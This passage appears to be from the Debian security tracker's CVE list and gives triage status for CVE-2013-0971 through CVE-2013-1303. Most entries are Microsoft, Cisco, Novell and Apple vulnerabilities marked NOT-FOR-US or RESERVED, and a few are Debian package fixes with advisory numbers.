NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1303 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1302 (Microsoft Communicator 2007 R2, Lync 2010, Lync 2010 Attendee, and ...) NOT-FOR-US: Microsoft CVE-2013-1301 (Microsoft Visio 2003 SP3 2007 SP3, and 2010 SP1 allows remote ...) NOT-FOR-US: Microsoft Visio CVE-2013-1300 RESERVED CVE-2013-1299 (Microsoft Windows Modern Mail allows remote attackers to spoof link ...) NOT-FOR-US: Microsoft Windows Modern Mail CVE-2013-1298 RESERVED CVE-2013-1297 (Microsoft Internet Explorer 6 through 8 does not properly restrict ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1296 (The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote ...) NOT-FOR-US: Microsoft Remote Desktop Connection Client CVE-2013-1295 (The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP ...) NOT-FOR-US: Microsoft Windows CVE-2013-1294 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2013-1293 (The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows ...) NOT-FOR-US: Microsoft Windows CVE-2013-1292 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1291 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2013-1290 (Microsoft SharePoint Server 2013, in certain configurations involving ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-1289 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-1288 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-1287 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2013-1286 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2013-1285 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2013-1284 (Race condition in the kernel in Microsoft Windows 8, Windows Server ...) NOT-FOR-US: Microsoft Windows CVE-2013-1283 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1282 (The LDAP service in Microsoft Active Directory, Active Directory ...) NOT-FOR-US: Microsoft CVE-2013-1281 (The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and ...) NOT-FOR-US: Microsoft Windows CVE-2013-1280 (The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 ...) NOT-FOR-US: Microsoft Windows CVE-2013-1279 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2013-1278 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, ...) NOT-FOR-US: Microsoft Windows CVE-2013-1277 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1276 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1275 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1274 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1273 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1272 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1271 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1270 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1269 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1268 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1267 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1266 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1265 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1264 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1263 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1262 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1261 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1260 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1259 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1258 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1257 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1256 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1255 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1254 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1253 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1252 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1251 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1250 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1249 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2013-1248 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...) NOT-FOR-US: Microsoft Windows CVE-2012-6501 (The KillProcess method in the HP PKI ActiveX control (HPPKI.ocx) ...) NOT-FOR-US: HP PKI ActiveX CVE-2012-6500 (Directory traversal vulnerability in download.lib.php in Pragyan CMS ...) NOT-FOR-US: Pragyan CMS CVE-2012-6499 (Open redirect vulnerability in age-verification.php in the Age ...) NOT-FOR-US: Age Verification plugin for WordPress CVE-2011-5254 (Unspecified vulnerability in the Connections plugin before 0.7.1.6 for ...) NOT-FOR-US: Connections plugin for WordPress CVE-2011-5253 (Dl Download Ticket Service 0.3 through 0.9 allows remote attackers to ...) NOT-FOR-US: Dl Download Ticket Service CVE-2011-5252 (Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x ...) NOT-FOR-US: Orchard CVE-2012-0722 REJECTED CVE-2013-1247 RESERVED CVE-2013-1246 RESERVED CVE-2013-1245 (The user-management page in Cisco WebEx Social relies on client-side ...) NOT-FOR-US: Cisco WebEx Social CVE-2013-1244 (Cross-site scripting (XSS) vulnerability in the portal module in Cisco ...) NOT-FOR-US: Cisco WebEx Social CVE-2013-1243 RESERVED CVE-2013-1242 (Memory leak in the web framework in the server in Cisco Unified ...) NOT-FOR-US: Cisco CVE-2013-1241 (The ISM module in Cisco IOS on ISR G2 routers does not properly handle ...) NOT-FOR-US: Cisco IOS CVE-2013-1240 (The command-line interface in Cisco Unified Communications Manager ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-1239 RESERVED CVE-2013-1238 RESERVED CVE-2013-1237 RESERVED CVE-2013-1236 (Cisco TelePresence Supervisor MSE 8050 before 2.3(1.31) allows remote ...) NOT-FOR-US: Cisco TelePresence Supervisor CVE-2013-1235 (Cisco Wireless LAN Controller (WLC) devices do not properly address ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1234 (The SNMP module in Cisco IOS XR allows remote authenticated users to ...) NOT-FOR-US: Cisco IOS XR CVE-2013-1233 RESERVED CVE-2013-1232 (The HTTP implementation in Cisco WebEx Node for MCS, WebEx Meetings ...) NOT-FOR-US: Cisco WebEx CVE-2013-1231 (The HTTP implementation in Cisco WebEx Node for MCS and WebEx Meetings ...) NOT-FOR-US: Cisco WebEx CVE-2013-1230 (Cisco Unified Communications Domain Manager allows remote attackers to ...) NOT-FOR-US: Cisco CVE-2013-1229 (TMSSNMPService.exe in TelePresence Manager in Cisco TelePresence ...) NOT-FOR-US: Cisco CVE-2013-1228 RESERVED CVE-2013-1227 (Cross-site scripting (XSS) vulnerability in the web framework in Cisco ...) NOT-FOR-US: Cisco Unified Communications Domain Manager CVE-2013-1226 (The Ethernet frame-forwarding implementation in Cisco NX-OS on Nexus ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1225 (Cisco Unified Customer Voice Portal (CVP) Software before 9.0.1 ES 11 ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1224 (Directory traversal vulnerability in the Resource Manager in Cisco ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1223 (The log viewer in Cisco Unified Customer Voice Portal (CVP) Software ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1222 (The Tomcat Web Management feature in Cisco Unified Customer Voice ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1221 (The Tomcat Web Management feature in Cisco Unified Customer Voice ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1220 (The CallServer component in Cisco Unified Customer Voice Portal (CVP) ...) NOT-FOR-US: Cisco Unified Customer Voice Portal CVE-2013-1219 (SensorApp in Cisco Intrusion Prevention System (IPS) allows local ...) NOT-FOR-US: Cisco Intrusion Prevention System CVE-2013-1218 RESERVED CVE-2013-1217 (The generic input/output control implementation in Cisco IOS does not ...) NOT-FOR-US: Cisco IOS CVE-2013-1216 (Memory leak in the SNMP module in Cisco IOS XR allows remote ...) NOT-FOR-US: Cisco IOS XR CVE-2013-1215 (The vpnclient program in the Easy VPN component on Cisco Adaptive ...) NOT-FOR-US: Cisco CVE-2013-1214 (The scripts editor in Cisco Unified Contact Center Express (aka ...) NOT-FOR-US: Cisco Unified Contact Center Express CVE-2013-1213 RESERVED CVE-2013-1212 RESERVED CVE-2013-1211 RESERVED CVE-2013-1210 RESERVED CVE-2013-1209 RESERVED CVE-2013-1208 RESERVED CVE-2013-1207 RESERVED CVE-2013-1206 RESERVED CVE-2013-1205 RESERVED CVE-2013-1204 RESERVED CVE-2013-1203 RESERVED CVE-2013-1202 RESERVED CVE-2013-1201 RESERVED CVE-2013-1200 (Session fixation vulnerability in Cisco Secure Access Control System ...) NOT-FOR-US: Cisco Secure Access Control System CVE-2013-1199 (Race condition in the CIFS implementation in the rewriter module in ...) NOT-FOR-US: Cisco CVE-2013-1198 (Cross-site scripting (XSS) vulnerability in a Flash component in Cisco ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1197 (The XML parser in the server in Cisco Unified Presence (CUP) allows ...) NOT-FOR-US: Cisco Unified Presence CVE-2013-1196 (The command-line interface in Cisco Secure Access Control System ...) NOT-FOR-US: Cisco CVE-2013-1195 (The time-based ACL implementation on Cisco Adaptive Security ...) NOT-FOR-US: isco Adaptive Security Appliances CVE-2013-1194 (The ISAKMP implementation on Cisco Adaptive Security Appliances (ASA) ...) NOT-FOR-US: Cisco CVE-2013-1193 (The Secure Shell (SSH) implementation on Cisco Adaptive Security ...) NOT-FOR-US: Cisco CVE-2013-1192 (The JAR files on Cisco Device Manager for Cisco MDS 9000 devices ...) NOT-FOR-US: Cisco Device Manager CVE-2013-1191 RESERVED CVE-2013-1190 RESERVED CVE-2013-1189 (Cisco Universal Broadband (aka uBR) 10000 series routers, when an ...) NOT-FOR-US: Cisco Universal Broadband 10000 series routers CVE-2013-1188 (Cisco Unified Communications Manager (CUCM) does not properly limit ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-1187 (The Connection Manager in Cisco Jabber Extensible Communications ...) NOT-FOR-US: Cisco CVE-2013-1186 (Cisco Unified Computing System (UCS) 1.x before 1.4(4) and 2.x before ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1185 (The web interface in the Manager component in Cisco Unified Computing ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1184 (The management API in the XML API management service in the Manager ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1183 (Buffer overflow in the Intelligent Platform Management Interface ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1182 (The login page in the Web Console in the Manager component in Cisco ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-1181 (Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), ...) NOT-FOR-US: Cisco CVE-2013-1180 (Buffer overflow in the SNMP implementation in Cisco NX-OS on Nexus ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1179 (Multiple buffer overflows in the (1) SNMP and (2) License Manager ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1178 (Multiple buffer overflows in the Cisco Discovery Protocol (CDP) ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1177 (SQL injection vulnerability in Cisco Network Admission Control (NAC) ...) NOT-FOR-US: Cisco Network Admission Control Manager CVE-2013-1176 (The DSP card on Cisco TelePresence MCU 4500 and 4501 devices before ...) NOT-FOR-US: Cisco CVE-2013-1175 (The SSL logging daemon in the Application Control Engine module in ...) NOT-FOR-US: Cisco ACE CVE-2013-1174 (Cisco Tivoli Business Service Manager (TBSM) in Hosted Collaboration ...) NOT-FOR-US: Cisco Tivoli Business Service Manager CVE-2013-1173 (Heap-based buffer overflow in ciscod.exe in the Cisco Security Service ...) NOT-FOR-US: Cisco AnyConnect CVE-2013-1172 (The Cisco Security Service in Cisco AnyConnect Secure Mobility Client ...) NOT-FOR-US: Cisco AnyConnect CVE-2013-1171 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: Cisco Connected Grid Network Management System (CG-NMS) CVE-2013-1170 (The Cisco Prime Network Control System (NCS) appliance with software ...) NOT-FOR-US: Cisco Prime Network Control System CVE-2013-1169 (Cisco Unified MeetingPlace Web Conferencing Server 7.x before 7.1MR1 ...) NOT-FOR-US: Cisco Unified MeetingPlace Web Conferencing Server CVE-2013-1168 (The web server in Cisco Unified MeetingPlace Application Server 7.x ...) NOT-FOR-US: Cisco Unified MeetingPlace Application Server CVE-2013-1167 (Cisco IOS XE 3.2 through 3.4 before 3.4.2S, and 3.5, on 1000 series ...) NOT-FOR-US: Cisco IOS XE CVE-2013-1166 (Cisco IOS XE 3.2 through 3.4 before 3.4.5S, and 3.5 through 3.7 before ...) NOT-FOR-US: Cisco IOS XE CVE-2013-1165 (Cisco IOS XE 2.x and 3.x before 3.4.5S, and 3.5 through 3.7 before ...) NOT-FOR-US: Cisco IOS XE CVE-2013-1164 (Cisco IOS XE 3.4 before 3.4.4S, 3.5, and 3.6 on 1000 series ...) NOT-FOR-US: Cisco IOS XE CVE-2013-1163 (Multiple SQL injection vulnerabilities in the device-management ...) NOT-FOR-US: Cisco CVE-2013-1162 (The traffic engineering (TE) processing subsystem in Cisco IOS XR ...) NOT-FOR-US: Cisco CVE-2013-1161 (The XML parser in the Cisco Jabber IM application for Android allows ...) NOT-FOR-US: Cisco CVE-2013-1160 (Cross-site scripting (XSS) vulnerability in the OpenView web menus in ...) NOT-FOR-US: Cisco CVE-2013-1159 (Cross-site scripting (XSS) vulnerability in the Netcool Impact (NCI) ...) NOT-FOR-US: Cisco CVE-2013-1158 (Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring ...) NOT-FOR-US: IBM CVE-2013-1157 (Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring ...) NOT-FOR-US: IBM CVE-2013-1156 (Directory traversal vulnerability in Cisco Prime Central for Hosted ...) NOT-FOR-US: Cisco CVE-2013-1155 (The auth-proxy functionality in Cisco Firewall Services Module (FWSM) ...) NOT-FOR-US: Cisco Firewall Services Module CVE-2013-1154 (The Cisco Small Business 200 Series Smart Switch 1.2.7.76 and earlier, ...) NOT-FOR-US: Cisco Small Business switches CVE-2013-1153 (Cross-site request forgery (CSRF) vulnerability in the web interface ...) NOT-FOR-US: Cisco Prime Infrastructure CVE-2013-1152 (Cisco Adaptive Security Appliances (ASA) devices with software 9.0 ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-1151 (Cisco Adaptive Security Appliances (ASA) devices with software 7.x ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-1150 (The authentication-proxy implementation on Cisco Adaptive Security ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-1149 (Cisco Adaptive Security Appliances (ASA) devices with software 7.x ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-1148 (The General Responder implementation in the IP Service Level Agreement ...) NOT-FOR-US: Cisco IOS CVE-2013-1147 (The Protocol Translation (PT) functionality in Cisco IOS 12.3 through ...) NOT-FOR-US: Cisco IOS CVE-2013-1146 (The Smart Install client functionality in Cisco IOS 12.2 and 15.0 ...) NOT-FOR-US: Cisco IOS CVE-2013-1145 (Memory leak in Cisco IOS 12.2, 12.4, 15.0, and 15.1, when Zone-Based ...) NOT-FOR-US: Cisco IOS CVE-2013-1144 (Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows ...) NOT-FOR-US: Cisco IOS CVE-2013-1143 (The RSVP protocol implementation in Cisco IOS 12.2 and 15.0 through ...) NOT-FOR-US: Cisco IOS CVE-2013-1142 (Race condition in the VRF-aware NAT feature in Cisco IOS 12.2 through ...) NOT-FOR-US: Cisco IOS CVE-2013-1141 (The mDNS snooping functionality on Cisco Wireless LAN Controller (WLC) ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1140 (The XML parser in Cisco Security Monitoring, Analysis, and Response ...) NOT-FOR-US: Cisco Security MARS CVE-2013-1139 (The nsAPI interface in Cisco Cloud Portal 9.1 SP1 and SP2, and 9.3 ...) NOT-FOR-US: Cisco Cloud Portal CVE-2013-1138 (The NAT process on Cisco Adaptive Security Appliances (ASA) devices ...) NOT-FOR-US: Cisco CVE-2013-1137 (Cisco Unified Presence Server (CUPS) 8.6, 9.0, and 9.1 before 9.1.1 ...) NOT-FOR-US: Cisco Unified Presence Server CVE-2013-1136 (The crypto engine process in Cisco IOS on Aggregation Services Router ...) NOT-FOR-US: Cisco IOS CVE-2013-1135 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...) NOT-FOR-US: Cisco Prime Central CVE-2013-1134 (The Location Bandwidth Manager (LBM) Intracluster-communication ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-1133 (Cisco Unified Communications Manager (CUCM) 8.6 before 8.6(2a)su2, 8.6 ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-1132 RESERVED CVE-2013-1131 (Cisco Small Business Wireless Access Points WAP200, WAP2000, WAP200E, ...) NOT-FOR-US: Cisco Small Business Wireless Access Points CVE-2013-1130 RESERVED CVE-2013-1129 (Memory leak in Cisco Unity Connection 9.x allows remote attackers to ...) NOT-FOR-US: Cisco CVE-2013-1128 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: Cisco Unified MeetingPlace CVE-2013-1127 RESERVED CVE-2013-1126 RESERVED CVE-2013-1125 (The command-line interface in Cisco Identity Services Engine Software, ...) NOT-FOR-US: Cisco CVE-2013-1124 (The Cisco Network Admission Control (NAC) agent on Mac OS X does not ...) NOT-FOR-US: Cisco Network Admission Control CVE-2013-1123 (Multiple cross-site scripting (XSS) vulnerabilities in the server in ...) NOT-FOR-US: Cisco Unified MeetingPlace CVE-2013-1122 (Cisco NX-OS on the Nexus 7000, when a certain Overlay Transport ...) NOT-FOR-US: Cisco NX-OS CVE-2013-1121 RESERVED CVE-2013-1120 (Multiple cross-site request forgery (CSRF) vulnerabilities on the ...) NOT-FOR-US: Cisco Unity Express CVE-2013-1119 RESERVED CVE-2013-1118 RESERVED CVE-2013-1117 RESERVED CVE-2013-1116 RESERVED CVE-2013-1115 RESERVED CVE-2013-1114 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unity ...) NOT-FOR-US: Cisco Unity Express CVE-2013-1113 (Cross-site scripting (XSS) vulnerability in Cisco Unified ...) NOT-FOR-US: Cisco Unified Communications Domain Manager CVE-2013-1112 (Cisco Carrier Routing System (CRS) allows remote attackers to cause a ...) NOT-FOR-US: Cisco Carrier Routing System CVE-2013-1111 (The Cisco ATA 187 Analog Telephone Adaptor with firmware 9.2.1.0 and ...) NOT-FOR-US: Cisco ATA 187 Analog Telephone Adaptor CVE-2013-1110 (Cisco WebEx Training Center allow remote authenticated users to bypass ...) NOT-FOR-US: Cisco WebEx Training Center CVE-2013-1109 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Cisco WebEx Training Center CVE-2013-1108 (Cisco WebEx Training Center allows remote authenticated users to ...) NOT-FOR-US: Cisco WebEx Training Center CVE-2013-1107 (The search function in Cisco Webex Social (formerly Cisco Quad) allows ...) NOT-FOR-US: Cisco Webex Social CVE-2013-1106 RESERVED CVE-2013-1105 (Cisco Wireless LAN Controller (WLC) devices with software 7.0 before ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1104 (The HTTP Profiling functionality on Cisco Wireless LAN Controller ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1103 (Cisco Wireless LAN Controller (WLC) devices with software 7.0 before ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1102 (The Wireless Intrusion Prevention System (wIPS) component on Cisco ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-1101 RESERVED CVE-2013-1100 (The HTTP server in Cisco IOS on Catalyst switches does not properly ...) NOT-FOR-US: Cisco IOS CVE-2013-1099 RESERVED CVE-2013-1098 RESERVED CVE-2013-1097 RESERVED CVE-2013-1096 RESERVED CVE-2013-1095 RESERVED CVE-2013-1094 RESERVED CVE-2013-1093 RESERVED CVE-2013-1092 (Multiple unquoted Windows search path vulnerabilities in Novell ...) NOT-FOR-US: Novell ZENworks Desktop Management CVE-2013-1091 (Stack-based buffer overflow in Novell iPrint Client before 5.90 allows ...) NOT-FOR-US: Novell iPrint Client CVE-2013-1090 RESERVED CVE-2013-1089 RESERVED CVE-2013-1088 (Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 ...) NOT-FOR-US: Novell iManager CVE-2013-1087 RESERVED CVE-2013-1086 (Cross-site scripting (XSS) vulnerability in WebAccess in Novell ...) NOT-FOR-US: Novell GroupWise CVE-2013-1085 (Stack-based buffer overflow in the nim: protocol handler in Novell ...) NOT-FOR-US: Novell Messenger CVE-2013-1084 RESERVED CVE-2013-1083 (Unspecified vulnerability in the login functionality in the Reporting ...) NOT-FOR-US: Novell Identity Manager CVE-2013-1082 (Directory traversal vulnerability in DUSAP.php in Novell ZENworks ...) NOT-FOR-US: Novell ZENworks CVE-2013-1081 (Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile ...) NOT-FOR-US: Novell ZENworks CVE-2013-1080 (The web server in Novell ZENworks Configuration Management (ZCM) 10.3 ...) NOT-FOR-US: Novell ZENworks CVE-2013-1079 (Directory traversal vulnerability in the ISCreateObject method in an ...) NOT-FOR-US: Novell ZENworks CVE-2013-1078 RESERVED CVE-2013-1077 RESERVED CVE-2013-1076 RESERVED CVE-2013-1075 RESERVED CVE-2013-1074 RESERVED CVE-2013-1073 RESERVED CVE-2013-1072 RESERVED CVE-2013-1071 RESERVED CVE-2013-1070 RESERVED CVE-2013-1069 RESERVED CVE-2013-1068 RESERVED CVE-2013-1067 RESERVED CVE-2013-1066 RESERVED CVE-2013-1065 RESERVED CVE-2013-1064 RESERVED CVE-2013-1063 RESERVED CVE-2013-1062 RESERVED CVE-2013-1061 RESERVED CVE-2013-1060 RESERVED CVE-2013-1059 RESERVED CVE-2013-1058 RESERVED CVE-2013-1057 RESERVED CVE-2013-1056 RESERVED CVE-2013-1055 RESERVED CVE-2013-1054 RESERVED CVE-2013-1053 RESERVED CVE-2013-1052 (pam-xdg-support, as used in Ubuntu 12.10, does not properly handle the ...) NOT-FOR-US: pam-xdg-support (Ubuntu-specific package) CVE-2013-1051 (apt 0.8.16, 0.9.7, and possibly other versions does not properly ...) - apt 0.9.7.8 [squeeze] - apt (InRelease support not used) CVE-2013-1050 (The default configuration in gnome-screensaver 3.5.4 through 3.6.0 ...) - gnome-screensaver (Ubuntu-specific Unity patch) CVE-2013-1049 (Buffer overflow in the RFC1413 (ident) client in cfingerd 1.4.3-3 ...) {DSA-2635-1} - cfingerd 1.4.3-3.1 (bug #700098) NOTE: https://bugs.launchpad.net/ubuntu/+source/cfingerd/+bug/1104425 CVE-2013-1048 (The Debian apache2ctl script in the apache2 package squeeze before ...) {DSA-2637-1} - apache2 2.2.22-13 CVE-2013-1047 RESERVED CVE-2013-1046 RESERVED CVE-2013-1045 RESERVED CVE-2013-1044 RESERVED CVE-2013-1043 RESERVED CVE-2013-1042 RESERVED CVE-2013-1041 RESERVED CVE-2013-1040 RESERVED CVE-2013-1039 RESERVED CVE-2013-1038 RESERVED CVE-2013-1037 RESERVED CVE-2013-1036 RESERVED CVE-2013-1035 RESERVED CVE-2013-1034 RESERVED CVE-2013-1033 RESERVED CVE-2013-1032 RESERVED CVE-2013-1031 RESERVED CVE-2013-1030 RESERVED CVE-2013-1029 RESERVED CVE-2013-1028 RESERVED CVE-2013-1027 RESERVED CVE-2013-1026 RESERVED CVE-2013-1025 RESERVED CVE-2013-1024 RESERVED CVE-2013-1023 RESERVED CVE-2013-1022 RESERVED CVE-2013-1021 RESERVED CVE-2013-1020 RESERVED CVE-2013-1019 RESERVED CVE-2013-1018 RESERVED CVE-2013-1017 RESERVED CVE-2013-1016 RESERVED CVE-2013-1015 RESERVED CVE-2013-1014 (Apple iTunes before 11.0.3 does not properly verify X.509 ...) TODO: check CVE-2013-1013 RESERVED CVE-2013-1012 RESERVED CVE-2013-1011 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1010 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1009 RESERVED CVE-2013-1008 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1007 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1006 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1005 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1004 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1003 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1002 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1001 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-1000 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0999 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0998 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0997 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0996 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0995 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0994 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0993 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0992 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0991 (WebKit, as used in Apple iTunes before 11.0.3, allows ...) TODO: check CVE-2013-0990 RESERVED CVE-2013-0989 RESERVED CVE-2013-0988 RESERVED CVE-2013-0987 RESERVED CVE-2013-0986 RESERVED CVE-2013-0985 RESERVED CVE-2013-0984 RESERVED CVE-2013-0983 RESERVED CVE-2013-0982 RESERVED CVE-2013-0981 (The IOUSBDeviceFamily driver in the USB implementation in the kernel ...) NOT-FOR-US: Apple iOS CVE-2013-0980 (The Passcode Lock implementation in Apple iOS before 6.1.3 does not ...) NOT-FOR-US: Apple iOS CVE-2013-0979 (lockdownd in Lockdown in Apple iOS before 6.1.3 does not properly ...) NOT-FOR-US: Apple iOS CVE-2013-0978 (The ARM prefetch abort handler in the kernel in Apple iOS before 6.1.3 ...) NOT-FOR-US: Apple iOS CVE-2013-0977 (dyld in Apple iOS before 6.1.3 and Apple TV before 5.2.1 does not ...) NOT-FOR-US: Apple iOS CVE-2013-0976 (IOAcceleratorFamily in Apple Mac OS X before 10.8.3 allows remote ...) NOT-FOR-US: Mac OS X CVE-2013-0975 RESERVED CVE-2013-0974 (StoreKit in Apple iOS before 6.1 does not properly handle the ...) NOT-FOR-US: Apple StoreKit CVE-2013-0973 (Software Update in Apple Mac OS X through 10.7.5 does not prevent ...) NOT-FOR-US: Mac OS X CVE-2013-0972 RESERVED CVE-2013-0971 (Use-after-free vulnerability in PDFKit in Apple Mac OS X before 10.8.3 ...) 